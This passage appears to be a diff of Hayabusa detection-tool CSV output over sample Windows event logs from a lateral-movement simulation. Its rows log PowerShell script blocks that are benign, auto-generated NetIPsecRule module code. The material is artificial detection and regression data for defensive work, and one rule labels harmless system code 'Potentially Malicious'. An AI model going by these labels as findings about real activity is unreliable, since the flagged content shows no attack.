$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] $",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_quer",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"{Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 